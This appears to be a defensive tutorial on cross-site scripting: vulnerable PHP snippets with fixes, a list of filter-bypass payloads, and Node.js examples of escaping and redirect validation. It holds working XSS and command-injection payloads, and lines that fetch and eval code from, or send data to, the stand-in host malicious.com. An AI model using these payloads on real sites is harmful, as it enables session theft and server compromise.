What is Cross Site Scripting?
Cross Site Scripting (XSS) is a type of security vulnerability found in web applications. It allows attackers to inject malicious scripts into content that is served to other users. This can lead to various attacks, such as stealing cookies, session tokens, or any sensitive information.
Common Backend Coding Mistakes Leading to XSS
Here are 20 common backend coding mistakes that lead to XSS, or make it easier to exploit, along with examples of how each can be abused. Unless stated otherwise the code is PHP and the payloads are shown unencoded.
-
1. Not Sanitizing User Input:
Code:
<?php $comment = $_POST['comment']; ?> <div><?php echo $comment; ?></div>
Payload:
<script>alert('XSS')</script>
The comment is written straight into the HTML, so the payload executes for every user who views it. Patch: Escape at output time with htmlspecialchars($comment, ENT_QUOTES, 'UTF-8'). "Sanitizing" input on the way in is not enough by itself, because the same value may later be rendered inside an attribute, a script block or a URL, and each of those contexts needs a different encoding.
-
2. Improperly Escaping Output:
Code:
<h1>Welcome, <?php echo $_GET['name']; ?></h1>
Payload:
<script>alert('XSS')</script>
This script will execute if name is echoed without escaping. Patch: Use htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8') so that <, >, & and both kinds of quote are rendered as text.
-
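As an added example (not code from the original post), items 1 and 2 and their fix in Node.js: an escaping function equivalent to htmlspecialchars with ENT_QUOTES, an unsafe and a safe comment renderer, and an attribute-context renderer, which is where item 2's "Welcome, name" pattern usually ends up next. The function names and the sample payload are my own.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Function names are assumed for the demonstration.

// Escape the five characters that change meaning in HTML text or inside a
// quoted attribute. Same transformation as PHP's
// htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the equivalent of <div><?php echo $comment; ?></div>.
function renderCommentUnsafe(comment) {
  return `<div>${comment}</div>`;
}

// Fixed: escape at the point of output. The stored comment stays exactly as
// the user typed it; only its HTML representation changes.
function renderCommentSafe(comment) {
  return `<div>${escapeHtml(comment)}</div>`;
}

// Attribute context: escaping is still required and the attribute must be
// quoted. Unquoted, a single space in the value ends it and the remainder
// becomes new attributes such as onerror=.
function renderAvatarSafe(url) {
  return `<img src="${escapeHtml(url)}" alt="">`;
}

// Demonstration with a constructed payload.
const SAMPLE = "<script>alert('XSS')</script>";
console.log(renderCommentUnsafe(SAMPLE)); // script tag reaches the browser intact
console.log(renderCommentSafe(SAMPLE));   // rendered as literal text
console.log(renderAvatarSafe(`x" onerror="alert('XSS')`)); // quote is neutralised
```

Note that escaping happens in the renderer, not when the comment is stored: a value that is escaped on input and later shown inside a JSON blob or a JavaScript string would be wrong for that context, while escape-on-output lets each renderer apply the encoding its context needs.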
3. Using eval() on User Input:
Code:
<?php eval($_GET['code']); ?>
Payload:
echo "<script>alert('XSS')</script>";
eval() runs the submitted string as PHP on the server, so this is remote code execution rather than plain XSS: the attacker can print any HTML they like, as here, or call phpinfo(), read files or run commands. (A JavaScript-only payload such as alert('XSS'); would simply fail as PHP.) Patch: Never pass user input to eval(); there is no validation strict enough to make it safe.
-
4. Allowing HTML in User Profiles:
Code:
<?php $bio = $_POST['bio']; ?> <div><?php echo $bio; ?></div>
Payload:
<script>alert('XSS')</script>
Whatever the user writes in the bio is stored and rendered as HTML for every visitor who views the profile. Patch: If the bio is plain text, escape it with htmlspecialchars. If formatting is genuinely required, run it through an allowlist HTML sanitizer such as HTML Purifier; strip_tags() with an allowed-tags list is not a sanitizer, because it keeps attributes such as onclick on the tags it allows.
-
5. Using Dangerous HTML Attributes:
Code:
<img src="image.jpg" onclick="alert('XSS')">
Payload:
<img src=x onerror=alert('XSS')>
The handler in the code above is harmless on its own because the developer wrote it; the mistake is accepting user HTML that keeps such attributes, or placing user data inside an attribute value without escaping. The payload needs no <script> tag at all: onerror fires as soon as the broken image fails to load, which is why filters that only look for <script> miss it. Patch: Escape attribute values with htmlspecialchars(..., ENT_QUOTES), strip all on* attributes with an allowlist sanitizer, and deploy a CSP that forbids inline handlers.
-
6. Not Validating File Uploads:
Code:
<form action="upload.php" method="post"> <input type="file" name="file"> </form>
Payload:
<script>alert('XSS')</script>
If the upload is served back from the same origin with a content type the browser renders (an .html or .svg file, or a text file the browser sniffs as HTML), the embedded script runs with the site's origin. Patch: Validate the type by content rather than extension, store uploads outside the web root, serve them with Content-Disposition: attachment and X-Content-Type-Options: nosniff, and ideally from a separate domain.
-
7. Exposing Sensitive Data in APIs:
Code:
<?php echo json_encode($_GET); ?>
Payload:
<img src=x onerror=alert('XSS')>
json_encode() escapes / (so </script> becomes <\/script>) but leaves < and > untouched, and this page sends no Content-Type header, so the browser renders the JSON as text/html and the image tag executes. Patch: Send Content-Type: application/json with X-Content-Type-Options: nosniff, and when JSON is embedded in a page encode it with JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT.
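As an added example (not from the original post), the same problem in Node.js: JSON embedded inside a <script> block, first with plain JSON.stringify, which like json_encode leaves < and > alone, then with the extra escaping that the JSON_HEX_* flags provide. The functions and the payload are my own.

```javascript
// Added example, not from the original post. Node.js, no dependencies.

// Vulnerable: what <script>var state = <?php echo json_encode($data); ?>;</script>
// produces. JSON.stringify, like json_encode without JSON_HEX_TAG, leaves < and >
// untouched (json_encode additionally escapes / by default; JSON.stringify does not).
function embedStateUnsafe(data) {
  return `<script>var state = ${JSON.stringify(data)};</script>`;
}

// Fixed: escape the characters that matter to the HTML parser inside the JSON
// text using JSON's own \uXXXX escapes, so the value decodes unchanged.
// Same effect as json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS)
// (double quotes are already escaped by JSON.stringify); U+2028/2029 are also
// escaped because older engines treat them as line terminators.
function jsonForScript(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/'/g, '\\u0027')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function embedStateSafe(data) {
  return `<script>var state = ${jsonForScript(data)};</script>`;
}

// The HTML tokenizer ends a script block at the first "</script" it sees,
// regardless of JavaScript string boundaries. This mimics that rule.
function scriptBodySeenByBrowser(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.toLowerCase().indexOf('</script', start);
  return html.slice(start, end);
}

// The escaped form must still parse to the same value.
function roundTrips(data) {
  return JSON.stringify(JSON.parse(jsonForScript(data))) === JSON.stringify(data);
}

// Constructed payload: closes the script block early and opens a new one.
const PAYLOAD = { q: "</script><script>alert('XSS')</script>" };
console.log('unsafe body:', scriptBodySeenByBrowser(embedStateUnsafe(PAYLOAD)));
console.log('safe body:  ', scriptBodySeenByBrowser(embedStateSafe(PAYLOAD)));
console.log('round trip: ', roundTrips(PAYLOAD));
```

The unsafe body stops at `var state = {"q":"` and the rest of the payload becomes a real script element; the safe body keeps the whole object, because the escapes are resolved by the JavaScript engine, not by the HTML parser.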
-
8. Ignoring Security Features of Frameworks:
Code:
<?php echo $userInput; ?>
Payload:
<script>alert('XSS')</script>
Template engines such as Twig and Blade escape {{ }} output by default; the mistake is bypassing them with raw-output syntax ({!! !!}, |raw, a bare echo) for user data. Patch: Keep auto-escaping on and reserve raw output for content that has already passed an HTML sanitizer.
-
9. Not Using HTTPOnly Cookies:
Code:
setcookie("session", $sessionId);
Payload:
alert(document.cookie)
Any injected script can read document.cookie and send the session ID to the attacker. Patch: setcookie("session", $sessionId, ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']). HttpOnly stops the cookie being read, but an XSS payload can still act inside the victim's session by sending requests from the page, so this limits the damage rather than preventing the attack.
-
10. Not Implementing Content Security Policy (CSP):
Code:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'">
Payload:
<script src="http://malicious.com/xss.js"></script>
The code above is the mitigation, not the mistake: with this policy (better sent as the Content-Security-Policy HTTP header) the browser refuses to load scripts from other origins, and inline <script> blocks and on* handlers are blocked too unless 'unsafe-inline', a nonce or a hash allows them. Without a CSP, an injected <script src> tag loads and runs the attacker's file. Patch: Ship a strict CSP (script-src with nonces or hashes, no 'unsafe-inline'), and treat it as defence in depth behind output encoding.
-
11. Using untrusted data in JavaScript:
Code:
document.getElementById('output').innerHTML = userInput;
Payload:
<img src=x onerror=alert('XSS')>
innerHTML parses the string as HTML. A <script> tag inserted this way is not executed, but event-handler attributes such as onerror are, as are <iframe srcdoc> and javascript: links. Patch: Assign with textContent (or create elements and set their properties) when the data is text; if HTML is required, sanitize it first with a library such as DOMPurify.
-
12. Exposing Debug Information:
Code:
echo $errorMessage;
Payload:
<script>alert('XSS')</script>
If the error message echoes the request (a bad parameter name, the failing query string, a stack trace containing the URL) it becomes a reflection point for whatever the attacker sent, and the details also help them map the application. Patch: Log details server-side, show users a generic message, and escape anything that is displayed.
-
13. Using Dangerous Functions:
Code:
system($_GET['cmd']);
Payload:
cmd=;id
system() hands the value to a shell, so this is command injection (code execution on the server), not XSS; a JavaScript alert has no meaning here. Patch: Do not pass user input to system(), exec(), passthru() or shell_exec(); if an external program is unavoidable, use escapeshellarg() and an allowlist of permitted values.
-
14. Not Validating User Input Length:
Code:
$comment = $_POST['comment'];
Payload:
<script>alert('XSS')</script>
A length limit on its own does not stop XSS: <svg/onload=alert(1)> is about twenty characters and fits most fields. Limits matter because very long input can exceed what a filter, regex or WAF inspects. Patch: Enforce a length and an allowlisted format on input, and still escape on output.
-
15. Allowing Unfiltered User Comments:
Code:
$comments[] = $_POST['comment'];
Payload:
<script>alert('XSS')</script>
Comments are stored and served to everyone who views the page, so a single payload hits every visitor (stored XSS). Patch: Escape with htmlspecialchars when rendering; if comments may contain markup, pass them through an allowlist sanitizer and escape everything else.
-
16. Using Non-Whitelisted URL Redirects:
Code:
header("Location: " . $_GET['url']);
Payload:
url=http://malicious.com
Redirecting users to an attacker-controlled site (open redirect). This is a separate weakness from XSS, but it is routinely chained with it for phishing, and the same parameter often ends up in an <a href> as well, where a javascript: URL would execute. Patch: Accept only relative paths or hosts from an allowlist; parse the URL and reject unknown schemes, and never concatenate raw input into Location.
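As an added example (not from the original post), a redirect validator in Node.js that does what the patch describes: parse the target against the site's own origin, accept only https, compare the whole origin against an allowlist, and strip credentials. The origin, the allowlist and the candidate inputs are assumed for the demonstration.

```javascript
// Added example, not from the original post. Node.js (WHATWG URL is built in).
// The origin and allow-list are assumed for the demonstration.

const SITE_ORIGIN = 'https://example.com';
const ALLOWED_ORIGINS = new Set(['https://example.com', 'https://www.example.com']);

// Vulnerable: header("Location: " . $_GET['url']) forwards whatever arrived.
function unsafeRedirectTarget(input) {
  return input;
}

// Returns an absolute URL that is safe to put in Location, or null to reject.
function safeRedirectTarget(input) {
  if (typeof input !== 'string' || input === '') return null;
  let url;
  try {
    // Resolve against our own origin: "/account" becomes a full URL, and
    // protocol-relative "//evil.com" (or "/\evil.com", since the parser treats
    // a backslash as a slash) reveals its real host.
    url = new URL(input, SITE_ORIGIN);
  } catch {
    return null; // unparseable
  }
  // javascript:, data:, vbscript: and plain http: never pass this check.
  if (url.protocol !== 'https:') return null;
  // Compare the whole origin (scheme + host + port), not a string prefix. This
  // rejects https://example.com.evil.com and https://example.com@evil.com
  // (whose host is evil.com) as well as unexpected ports.
  if (!ALLOWED_ORIGINS.has(url.origin)) return null;
  // Never forward credentials that happened to be in the URL.
  url.username = '';
  url.password = '';
  return url.toString();
}

// Constructed inputs a normal user or an attacker might send.
const CANDIDATES = [
  '/account',
  'https://www.example.com/settings?tab=1',
  'http://malicious.com',
  '//malicious.com/login',
  'javascript:alert(1)',
  'https://example.com@malicious.com/',
  'https://example.com.malicious.com/',
];
for (const c of CANDIDATES) {
  console.log(JSON.stringify(c), '->', safeRedirectTarget(c));
}
```

The important design choice is to compare url.origin rather than test whether the string starts with the site name: prefix checks are exactly what the userinfo and subdomain-suffix inputs in the candidate list are built to defeat.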
-
17. Ignoring Secure Coding Practices:
Code:
$userInput = $_GET['input'];
Payload:
<script>alert('XSS')</script>
Reading the input is fine; the bug is what happens to it afterwards. Patch: Apply one consistent rule (validate on input, encode for the output context) and make sure developers know it and the code review checks for it.
-
18. Using Non-secure HTTP:
Code:
http://example.com/api
Payload:
http://malicious.com
Over plain HTTP an on-path attacker can rewrite any response and inject their own script, which behaves exactly like XSS without needing a bug in the application. Patch: Serve everything over HTTPS and enable HSTS so browsers refuse to fall back to HTTP.
-
19. Using Deprecated Libraries:
Code:
include("old_library.php");
Payload:
<script>alert('XSS')</script>
Outdated components (a JavaScript widget, a template engine, an old sanitizer) may carry known XSS bugs that an attacker can look up. Patch: Track dependencies, apply updates promptly, and watch advisories for the components in use.
-
20. Not Implementing Rate Limiting:
Code:
if ($_SESSION['requests'] > 100) { /* block */ }
Payload:
<script>alert('XSS')</script>
Rate limiting does not prevent XSS on its own; it slows down brute-force attempts and keeps an attacker from probing many payloads quickly. The session-based counter shown is reset simply by discarding the cookie, so it needs to be keyed on the client address or account instead. Patch: Rate-limit login, password reset and other sensitive endpoints, and combine it with the output encoding above.
XSS Filter Bypass Payloads
Here are 20 common bypass payloads with explanations:
-
1. URL Encoding:
Payload:
%3Cscript%3Ealert('XSS')%3C/script%3E
URL-encoding the angle brackets. The web server decodes %3C back to < before the application sees it, so this only defeats filters applied to the raw, still-encoded string (for example a WAF rule or a check on the query string before decoding).
-
2. Hexadecimal Encoding:
Payload:
<img src=x onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;('XSS')">
Hex character references inside an attribute value are decoded by the HTML parser before the handler runs, so the word alert never appears literally in the request. The same idea works inside a JavaScript string (\x3cscript\x3e).
-
3. Base64 Encoding:
Payload:
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
Base64 encoding the script. This does nothing by itself; it only helps when something decodes it for you, for example an application that base64-decodes a parameter before rendering it, or a data:text/html;base64 URL placed in an <iframe src> or <object data>.
-
4. Inline Event Handlers:
Payload:
<img src=x onerror=alert('XSS')>
Using onerror to execute script when the image fails to load; no <script> tag is needed, so filters that only match on tag names miss it.
-
5. Using svg Tags:
Payload:
<svg/onload=alert('XSS')>
Using the svg element's onload handler. The / in place of whitespace defeats filters that expect a space between the tag name and the attribute.
-
6. javascript: URLs in CSS:
Payload:
<div style="background-image:url(javascript:alert('XSS'))">
Using a CSS property to execute JavaScript. Only old Internet Explorer executed javascript: URLs in CSS; current browsers ignore them, so this is for legacy targets only.
-
7. Comment Tags:
Payload:
<script>alert('XSS')//</script>
The trailing // comments out whatever the application appends on the same line (a closing quote or bracket), which keeps the injected statement syntactically valid; the HTML parser still ends the block at </script>.
-
8. Using iframe Tags:
Payload:
<iframe src="javascript:alert('XSS')"></iframe>
A javascript: URL as the iframe source is executed, and it runs in the origin of the embedding page.
-
9. Using link Tags:
Payload:
<link rel="stylesheet" href="javascript:alert('XSS')">
Exploiting a stylesheet link with a javascript: href. Historic (old Firefox and Internet Explorer); no current browser executes it.
-
10. Using style Tags:
Payload:
<style>body{background:url(javascript:alert('XSS'));}</style>
Injecting a javascript: URL via a CSS background. Same status as item 6: legacy browsers only.
-
11. Using `setTimeout`:
Payload:
<script>setTimeout('alert(\"XSS\")', 1000);</script>
Passing a string to setTimeout evaluates it like eval(); a filter that blocks "eval(" may not block this, and the string can be assembled from pieces at runtime.
-
12. Using `window.location`:
Payload:
javascript:window.location='http://malicious.com'
A javascript: URL, usable in an href or an iframe src. This one only redirects the user to an attacker site, but the same slot accepts any script.
-
13. Using `document.write`:
Payload:
document.write('<script>alert(\"XSS\")</script>');
document.write inserts markup at parse time and, unlike innerHTML, does execute <script> tags, so a page that writes user data this way is a DOM XSS sink.
-
14. Using `XMLHttpRequest`:
Payload:
var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://malicious.com', true); xhr.send();
Not a bypass but a second stage: once script is running, XMLHttpRequest (or an <img> with a crafted src) is used to send cookies or page content to the attacker's server.
-
15. Using `fetch` API:
Payload:
fetch('http://malicious.com').then(response => response.text()).then(data => eval(data));
Using fetch to pull a larger payload and eval it, so the injected part stays short. A CSP that restricts connect-src and script-src and omits 'unsafe-eval' blocks this stage.
-
16. Using `arguments.callee`:
Payload:
<script>(function(){alert(arguments.callee)})()</script>
arguments.callee refers to the running function, so it only exists inside a function (and not at all in strict mode); used at top level it throws a ReferenceError. It appears in obfuscated payloads that read their own source, which is what lets them slip past some signature filters.
-
17. Using double encoding:
Payload:
%253Cscript%253Ealert('XSS')%253C%2Fscript%253E
%25 is an encoded %, so one decoding pass yields %3Cscript%3E... and a second yields the tag. This defeats a filter that decodes once, inspects, and then hands the value to a component that decodes again.
-
18. Using the `Function` constructor:
Payload:
new Function('alert(\'XSS\')')();
Using Function constructor to execute code.
-
19. Using `src` attributes:
Payload:
<script src="http://malicious.com/xss.js"></script>
Loading an external script from a malicious host. A CSP whose script-src does not include that host blocks the load even after the injection succeeds.
-
20. Using JSONP:
Payload:
callback=alert('XSS')
A JSONP endpoint reflects the callback parameter into a JavaScript response; if it does not restrict callback to a valid identifier, the response body becomes alert('XSS')({...}) and any page that loads it as a script runs it. Such endpoints are also a way around a CSP that allowlists their host.
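As an added example (not from the original post), a Node.js script that runs a deny-list filter of the kind items 1, 2 and 17 are aimed at against constructed versions of the payloads above, with and without decoding, and then applies output encoding to the same inputs. It makes the two points a practitioner needs: decode before filtering (as many times as the downstream components will), and rely on output encoding rather than pattern matching, because the handler-based payloads never contain the string the filter looks for. The function names and payload set are my own.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Payloads are constructed from the list above; function names are assumed.

// The kind of deny-list filter the bypasses above are aimed at.
function naiveFilterBlocks(input) {
  return /<script/i.test(input);
}

// Percent-decode until the value stops changing (capped), so input that was
// encoded twice is seen the way the last decoding component will see it.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch {
      return current; // malformed escape sequence: stop here
    }
    if (next === current) return current;
    current = next;
  }
  return current;
}

// Output encoding, the fix from the first section, reduced to one line.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

const PAYLOADS = {
  plain:         "<script>alert('XSS')</script>",
  urlEncoded:    "%3Cscript%3Ealert('XSS')%3C/script%3E",
  doubleEncoded: "%253Cscript%253Ealert('XSS')%253C%2Fscript%253E",
  eventHandler:  "<img src=x onerror=alert('XSS')>",
  svgOnload:     "<svg/onload=alert('XSS')>",
};

// For one payload: is it blocked raw, blocked after decoding, and does any
// angle bracket survive output encoding?
function evaluate(payload) {
  const decoded = fullyDecode(payload);
  return {
    blockedRaw: naiveFilterBlocks(payload),
    blockedAfterDecode: naiveFilterBlocks(decoded),
    markupAfterEscape: /[<>]/.test(escapeHtml(decoded)),
  };
}

function summary() {
  const result = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    result[name] = evaluate(payload);
  }
  return result;
}

console.table(summary());
```

Run it and the table shows the pattern: the encoded variants pass the raw filter and are only caught after decoding, the onerror and svg payloads are never caught by the filter at all, and every row ends with no markup left after escaping.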
Conclusion
Cross Site Scripting is a serious vulnerability that can have significant consequences for web applications and their users. By understanding how XSS works, recognizing common coding mistakes, and implementing effective prevention techniques, developers can help protect their applications from such attacks.